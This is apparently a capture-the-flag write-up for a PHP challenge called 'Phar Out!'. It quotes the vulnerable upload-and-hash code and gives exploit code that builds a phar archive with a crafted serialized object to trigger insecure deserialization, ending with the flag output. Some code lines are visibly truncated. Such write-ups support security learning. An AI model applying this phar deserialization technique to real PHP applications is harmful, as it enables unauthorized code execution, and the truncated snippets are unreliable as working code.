Tags: phar php deserialization
Rating:
We were given the source code of an PHP application.
**index.php**
```
<html>
<head>
<title>Phar Out!</title>
</head>
<body>
Upload a file, and I'll hash it with MD5 :-)
0)
{
$dest_dir = getcwd() . "/uploads/";
echo "
Submitted
";
$target_file = $dest_dir . basename($_FILES["the_file"]["name"]);
//print_r($_FILES);
move_uploaded_file($_FILES["the_file"]["tmp_name"], $target_file);
if ($_POST['s'] === 'p')
$s = 'phar://';
else
$s = 'file://';
echo md5_file("$s$target_file");
unlink($target_file);
}
?>
</body>
</html>
```
**wrapper.php & doit.php**
```
doit)) {
$this->doit = new Doit();
} else {
echo "Hello from Wrapper!";
}
}
}
?>
```
As from the challenge's title **Phar out** we can immediately identify the vulnerability. It is all about [**unsecure phar deserialization**](https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2019/06/26/exploiting_php_phar-PRD7.html).
Analyzing the source code, the objective is to POST a crafted phar archive and try to instantiate the Wrapper class with the parameter `$doit` set to some value.
As `$doit` is a private class variable, we cannot simply use `$wrapper->doit='some value'`. We can though use PHP's [ReflectionClass](https://www.php.net/manual/en/class.reflectionclass.php) to set a value to `$doit`.
The final exploit code:
```
doit
$reflectionClass = new ReflectionClass('Wrapper');
$reflectionProperty = $reflectionClass->getProperty('doit');
$reflectionProperty->setAccessible(true);
$reflectionProperty->setValue($dummy, 'foobar');
// craft phar archive
$poc = new Phar("poc.phar");
$poc->startBuffering();
$poc->setStub("setMetadata($dummy);
$poc->stopBuffering();
```
By submitting the generated `poc.phar` and setting the POST parameter `s=p` we can get the flag.
```
<html>
<head>
<title>Phar Out!</title>
</head>
<body>
Upload a file, and I'll hash it with MD5 :-)
Submitted
flag{scooby}
</body>
</html>
```
Mantap banh ?
